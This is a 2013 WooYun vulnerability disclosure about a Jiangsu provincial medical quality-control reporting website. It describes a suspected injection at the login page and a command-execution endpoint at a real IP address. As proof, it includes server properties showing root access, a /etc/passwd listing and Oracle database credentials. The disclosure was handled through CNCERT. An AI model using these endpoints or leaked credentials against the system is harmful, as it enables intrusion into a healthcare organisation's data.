当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044981

漏洞标题:江苏省医疗质控信息网上填报分析系统疑似注射和命令执行

相关厂商:江苏省医疗质控信息网上填报分析系统

漏洞作者: 雅柏菲卡

提交时间:2013-12-05 11:50

修复时间:2014-01-19 11:51

公开时间:2014-01-19 11:51

漏洞类型:命令执行

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-05: 细节已通知厂商并且等待厂商处理中
2013-12-09: 厂商已经确认,细节仅向厂商公开
2013-12-19: 细节向核心白帽子及相关领域专家公开
2013-12-29: 细节向普通白帽子公开
2014-01-08: 细节向实习白帽子公开
2014-01-19: 细节向公众公开

简要描述:

.......

详细说明:

http://58.213.112.246:88/hospitalQC/login2.jsp

漏洞证明:

在密码和用户名处输入'
得到

QQ截图20131205112706.jpg


expecting ''', found '<EOF>' [select d from com.power.model.user.TsUser d where d.endDate is null and d.logonname=''']; nested exception is org.hibernate.QueryException: expecting ''', found '<EOF>' [select d from com.power.model.user.TsUser d where d.endDate is null and d.logonname=''']
可以得知可能存在注射
而 http://58.213.112.246:88/hospitalQC/user/loginNoJSON.action;jsessionid=3AA2BCDD8403C48E372F4AE0BD77C401
是一个 命令执行处
网站物理路径: /usr/apache-tomcat-6.0.29/webapps/hospitalQC
java.home: /usr/jdk1.6.0_21/jre
java.version: 1.6.0_21
os.name: SunOS
os.arch: sparc
os.version: 5.10
user.name: root
user.home: /
user.dir: /usr/apache-tomcat-6.0.29/bin
java.class.version: 50.0
java.class.path: /usr/apache-tomcat-6.0.29/bin/bootstrap.jar
java.library.path: /usr/jdk1.6.0_21/jre/lib/sparc/server:/usr/jdk1.6.0_21/jre/lib/sparc:/usr/jdk1.6.0_21/jre/../lib/sparc:/usr/jdk/packages/lib/sparc:/lib:/usr/lib
file.separator: /
path.separator: :
java.vendor: Sun Microsystems Inc.
java.vendor.url: http://java.sun.com/
java.vm.specification.version: 1.0
java.vm.specification.vendor: Sun Microsystems Inc.
java.vm.specification.name: Java Virtual Machine Specification
java.vm.version: 17.0-b16
java.vm.vendor: Sun Microsystems Inc.
java.vm.name: Java HotSpot(TM) Server VM
java.specification.version: 1.6
java.specification.vender:
java.specification.name: Java Platform API Specification
java.io.tmpdir: /usr/apache-tomcat-6.0.29/temp
hibernate信息
root权限
列出来的 部分信息
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
jdbc.driverClassName=oracle.jdbc.driver.OracleDriver
jdbc.url=jdbc:oracle:thin:@192.168.0.154:1521:tjzb
#jdbc.url=jdbc:oracle:thin:@127.0.0.1:1521:orcl
jdbc.username=hospitalqc2011
jdbc.password=hospitalqc2011

修复方案:

....................

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-12-09 22:05

厂商回复:

最新状态:

暂无